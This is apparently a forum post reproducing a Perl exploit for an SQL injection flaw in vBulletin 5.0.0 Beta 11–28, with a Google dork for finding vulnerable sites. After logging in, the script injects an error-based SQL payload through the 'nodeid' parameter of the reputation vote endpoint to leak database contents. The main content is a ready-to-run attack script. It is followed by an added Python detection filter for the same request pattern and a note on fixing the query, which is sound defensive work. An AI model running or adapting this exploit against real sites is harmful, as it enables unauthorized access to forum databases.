
vBulletin 5 Beta XX SQLi 0day

Admin

PHP:
# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None
 
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;
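
A defensive check for the request shape the script above sends, as an added example that is not part of the original post or of vBulletin's code: it flags POSTs to the `ajax/api/reputation/vote` endpoint whose `nodeid` is not a single plain integer. The function names, the `forum.example` host and the sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter name are taken from the posted script.
VOTE_ENDPOINT = "/ajax/api/reputation/vote"
# Keywords typical of error-based SQL injection strings (heuristic, not exhaustive).
SQL_MARKERS = re.compile(
    r"information_schema|floor\s*\(\s*rand|group\s+by|\b(?:select|union|concat)\b",
    re.IGNORECASE,
)

def inspect_request(method, url, body):
    """Return findings for one request; an empty list means nothing to report."""
    path = urlsplit(url).path.rstrip("/")
    if method.upper() != "POST" or not path.endswith(VOTE_ENDPOINT):
        return []
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    # PHP accepts nodeid[]=... as an array, so collect every spelling of the key.
    values = [v for k, vs in params.items()
              if k == "nodeid" or k.startswith("nodeid[") for v in vs]
    findings = []
    if len(values) != 1 or "nodeid" not in params:
        findings.append("nodeid missing, repeated or sent as array")
    for value in values:
        if not re.fullmatch(r"[0-9]{1,10}", value):
            findings.append("nodeid is not a plain integer")
        if SQL_MARKERS.search(value):
            findings.append("nodeid contains SQL keywords")
    return findings

# Constructed sample requests (method, URL, urlencoded body); forum.example is a placeholder.
VOTE_URL = "http://forum.example/index.php/ajax/api/reputation/vote"
SAMPLES = [
    ("POST", VOTE_URL, "nodeid=1337"),
    ("POST", VOTE_URL, "nodeid=12%29+and%28select+1+from+information_schema.tables+group+by+x"),
    ("POST", VOTE_URL, "nodeid[]=5"),
    ("GET", "http://forum.example/index.php", ""),
]

def scan(samples):
    """Map each sample's body to its findings, keeping only flagged requests."""
    return {body: f for method, url, body in samples
            if (f := inspect_request(method, url, body))}

if __name__ == "__main__":
    for body, findings in scan(SAMPLES).items():
        print(body, "->", "; ".join(findings))
```

A filter like this is a compensating control for a WAF rule or log review; the durable fix is for the application to bind `nodeid` as an integer parameter in the query.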
 
